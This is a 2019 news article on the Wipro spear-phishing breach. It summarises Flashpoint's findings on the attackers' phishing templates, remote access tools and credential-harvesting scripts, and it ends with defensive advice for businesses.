May 2, 2019

A closer look at the Wipro security breach

By Luke Christou

Outsourcing consulting firm Wipro has remained tight-lipped since announcing that it has been targeted by an “advanced phishing campaign” earlier this month, but a new report from cybersecurity company Flashpoint has shed some light on the breach.

Hackers are thought to have gained access to Wipro’s internal IT systems months ago, which was used to launch attacks on “at least a dozen” Wipro customers, KrebsOnSecurity reported soon after the announcement.

Flashpoint has uncovered evidence that seems to suggest that the group has been in operation since at least 2017, if not earlier. The attack relied on infrastructure reused from past campaigns, while the password ‘!NetWire102015!’ was used on a number of host or campaign IDs discovered.

So what do we know about the Wipro attackers, and how did they gain access to the company’s systems?

How did attackers infiltrated Wipro?

As initially revealed by Wipro, this was an advanced spear-phishing campaign designed to trick company employees into revealing confidential login information.

At least six different templates were discovered that encouraged victims to hand over their Windows login credentials.  Some of the templates used appeared to come from a security awareness training provider, seemingly to trick victims into a false sense of security.

These emails attempted to distribute a strain of malware known as Imminent Monitor, which provides access to administrative tools remotely. Likewise, templates also contained links to a site used to deliver Netwire, a remote access Trojan.

The cybersecurity company believes that Windows credentials were targeted in a bid to gain access to Wipro’s encrypted email system.

Wipro’s email system is thought to have been compromised for some time. The hackers are said to have gained access to more than 100 Wipro systems which were subsequently used to launch attacks on clients.

What happened once the attackers were in?

According to Flashpoint, after breaching a system, the attackers set about abusing legitimate tools often used by red team cybersecurity penetration testers, seemingly in an attempt to gather more confidential information used to breach Wipro clients while escaping detection.

Following a breach, the attacker dropped ScreenConnect, a legitimate remote access software, which allowed the attacker to take control of the machine at any time from a remote location.

Flashpoint also found powerkatz and powersploit scripts on domains used in the attack, which allows the attacker to search a system’s memory for credentials, tokens, and other authentication artefacts following a breach.

Insiders initially told KrebsOnSecurity that the breach was thought to be a state-sponsored attack. However, Flashpoint refutes this. Instead, it believes that the attackers were likely trying to gain access to the gift card and reward programme portals of Wipro clients for financial gain.

How can businesses protect against similar attacks?

Wipro has since “took remedial steps to contain and mitigate any potential impact”, which reportedly includes building a new private email network to provide better security for its customers.

But with a spear phishing attack costing businesses $1.6m on average, what can you do to stop your business from falling victim to a similar attack in the first place?

Read more: How to spot spear phishing and protect your business from costly attacks

According to Asaf Cidon, Vice President of Content Security at Barracuda Networks, businesses need to invest in both technology solutions and employee awareness training in order to safeguard against such threats:

“Staying ahead of these types of attacks requires the right combination of technology and user training, so it’s critical to have a solution in place that detects and protects against spear-phishing attacks, including business email compromise, brand impersonation, and sextortion.”

Increasingly complex systems are being designed to stop hackers from compromising systems, such as artificial intelligence solutions that detect and remove malicious actors before they can cause damage.

However, training employees on how to spot a phishing email can provide businesses with a less costly line of defence.